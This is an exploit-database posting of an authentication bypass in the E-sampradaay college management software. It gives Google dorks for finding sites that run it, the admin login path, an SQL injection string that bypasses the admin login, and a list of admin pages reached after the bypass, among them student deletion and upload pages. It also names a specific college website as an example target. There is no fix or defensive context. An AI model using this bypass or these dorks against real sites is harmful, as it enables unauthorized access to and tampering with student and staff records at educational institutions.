Vibrant Hardware and Software Solutions E-sampradaay India Improper Authorization Vulnerability

2018.11.09

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-592 CWE-284 CWE-285

Dork: intext:''Designed by Vibrant Hardware and Software Solutions'' site:edu.in

#################################################################################################
# Exploit Title : Vibrant Hardware and Software Solutions E-sampradaay Improper Authorization Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 09/11/2018
# Vendor Homepage : vibrantitsolutions.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Designed by Vibrant Hardware and Software Solutions'' site:edu.in
intext:''Designed : College ICT Laboratory'' site:edu.in
intext:''COPYRIGHT © 2016 VPCCECM & DEVELOPED BY VPC ICT LAB'' site:edu.in
intext:''© Copyright 2010 Vibrant IT Solutions Pvt. Ltd. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ] CWE-284 [ Improper Access Control ] CWE-285 [ Improper Authorization ]
#################################################################################################
# Admin Panel Login Path :
/esampradaay/admin_login.php
Admin Username : anything' OR 'x'='x
Admin Password : anything' OR 'x'='x
/esampradaay/admin_dashboard.php
/esampradaay/vidya_teaching_staff.php
/esampradaay/vidya_staff_register.php
/esampradaay/student_registration.php
/esampradaay/Parent_registration.php
/esampradaay/Management_register.php
/esampradaay/Alumini_Register.php
/esampradaay/student_attendance_menu.php
/esampradaay/student_attendance_upload.php
/esampradaay/dailycwreportAdmin.php
/esampradaay/staff_attendance_menu.php
/esampradaay/class.php
/esampradaay/eventmenu.php
/esampradaay/admin_menu.php
/esampradaay/addRollNum.php
/esampradaay/delete_student.php
/esampradaay/circular_upload.php
/esampradaay/certificate_upload.php
/esampradaay/cirview.php
/esampradaay/update_student.php
/esampradaay/staff_login.php
/esampradaay/update_nonteaching.php
#################################################################################################
# Example Vulnerable Site =>
[+] vidyaprabodhinicollege.edu.in/esampradaay/admin_login.php
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Vibrant Hardware and Software Solutions E-sampradaay India Improper Authorization Vulnerability

Dork: intext:''Designed by Vibrant Hardware and Software Solutions'' site:edu.in

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.